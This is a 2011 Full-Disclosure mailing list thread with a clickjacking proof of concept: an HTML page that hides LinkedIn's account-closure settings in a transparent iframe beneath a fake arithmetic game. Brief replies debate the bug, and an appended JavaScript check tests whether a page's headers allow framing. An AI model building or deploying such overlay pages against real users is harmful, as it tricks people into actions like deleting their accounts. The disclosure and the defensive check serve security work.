seems that you aren't familiar what Clickjacking means then...

No,... and am happy not to know :-) , like XSS, i do not waste time with minority bugs such as 'clickjacking' and these new such terms which are total BS.
anyhow... call it what you like, it is bs (just like the win32 dll crap and simple-xss) CRAP!)
xd

On 10 October 2011 04:53, Ferenc Kovacs <[email protected]> wrote:
> it seems that you aren't familiar what Clickjacking means then...
>
> On Sat, Oct 8, 2011 at 10:01 PM, xD 0x41 <[email protected]> wrote:
> > Thats just lame dude.... if you could remove OTHER peoples accounts, then id
> > say *clap clap*... but own account... what about just clicking "close
> > account" , and lets skip creating a html page, for this... :) cheers
> >
> >
> > On 8 October 2011 17:06, asish agarwalla <[email protected]> wrote:
> >>
> >> Be logged into Linkedin, in firefox
> >> Create a HTML page using the below code
> >> Open the created HTML page in a new firefox tab
> >> Play the simple game
> >>
> >> <html>
> >> <head>
> >> <style>
> >> button.dummy1{position:absolute;top:75px;left:177px;z-index:-10}
> >> button.dummy3{position:absolute;top:214px;left:177px;z-index:-10}
> >> #Div3{
> >> opacity: 0;
> >> position: absolute;
> >> top: 25px;
> >> left: 160px;
> >> }
> >> #Div2{
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 340px;
> >> }
> >> #Div1 {
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 195px;
> >> }
> >> #victim2 {
> >> opacity: 1;
> >> position: absolute;
> >> top: 65px;
> >> left: 50px;
> >> }
> >> #victim {
> >> opacity: 0.4;
> >> position: absolute;
> >> top: -226px;
> >> left: -35px;
> >> width:800px;
> >> height: 800px;
> >> }
> >> </style>
> >> </head>
> >> <body>
> >> <div>
> >> <h1>Please Click Twice on the Right Options And Then Click Submit</h1>
> >> </div>
> >> <div id=Div3>
> >> <h1>55+27=?</h1>
> >> </div>
> >> <div id=victim2>
> >> <h1>55 </h1>
> >> </div>
> >> <div id=Div1>
> >> <h1>82</h1>
> >> </div>
> >> <div id=Div2>
> >> <h1>95</h1>
> >> </div>
> >> <button type="button" class="dummy3">Submit</button>
> >> <div id=victim>
> >> <iframe
> >> src="https://www.linkedin.com/secure/settings?closemyaccountstart=&goback=.nas_*1_*1_*1"
> >> border=0 scrolling=no width=650 height=1100></iframe>
> >> </div>
> >> </body>
> >> </html>
> >>
> >> _______________________________________________
> >> Full-Disclosure - We believe in it.
> >> Charter: http://lists.grok.org.uk/full-disclosure-charter.html
> >> Hosted and sponsored by Secunia - http://secunia.com/
>
> --
> Ferenc Kovács
> @Tyr43l - http://tyrael.hu
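
Added example, not part of the original thread or written by any of its participants: the quoted PoC only works if the settings page lets itself be rendered inside a cross-origin iframe. The JavaScript below is a defender-side check of that precondition; it assumes the standard X-Frame-Options and CSP frame-ancestors response headers (neither is mentioned in the thread), and the function name and header sets are constructed for illustration.

```javascript
// Added example, not from the thread. Header sets passed in are constructed.
// Classifies whether a response may be rendered in a cross-origin <iframe>,
// which is what the overlay page in the quoted PoC depends on.
function framingVerdict(headers) {
  // Header names are case-insensitive, so normalise them first.
  const h = {};
  for (const [k, v] of Object.entries(headers)) h[k.toLowerCase()] = String(v);

  // 1. CSP frame-ancestors: when present it is the policy browsers enforce,
  //    and X-Frame-Options is ignored. Report-Only headers enforce nothing,
  //    so only the enforcing header is read.
  const csp = h['content-security-policy'] || '';
  for (const directive of csp.split(';')) {
    const [name, ...src] = directive.trim().toLowerCase().split(/\s+/);
    if (name !== 'frame-ancestors') continue;
    if (src.length === 0 || src.every((s) => s === "'none'")) return 'blocked';
    if (src.some((s) => ['*', 'http:', 'https:'].includes(s))) return 'framable';
    if (src.every((s) => s === "'self'")) return 'same-origin-only';
    return 'allowlist'; // framable only by the listed origins
  }

  // 2. X-Frame-Options: only a single DENY or SAMEORIGIN is relied on here.
  //    ALLOW-FROM, unknown or conflicting values are reported as framable so
  //    that they get fixed rather than trusted.
  const xfo = (h['x-frame-options'] || '').trim().toLowerCase();
  if (xfo === 'deny') return 'blocked';
  if (xfo === 'sameorigin') return 'same-origin-only';
  return 'framable';
}

// Constructed samples: a state-changing settings page served four ways.
const samples = {
  none: { 'Content-Type': 'text/html' },
  xfoDeny: { 'X-Frame-Options': 'DENY' },
  cspSelf: { 'Content-Security-Policy': "default-src 'self'; frame-ancestors 'self'" },
  reportOnly: { 'Content-Security-Policy-Report-Only': "frame-ancestors 'none'" },
};
for (const [name, hdrs] of Object.entries(samples)) {
  console.log(name.padEnd(12), framingVerdict(hdrs));
}
```

A verdict of 'framable' on a page that performs an account action means an overlay like the one quoted above can load it; 'blocked' or 'same-origin-only' means the browser refuses to render it in a third-party frame.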
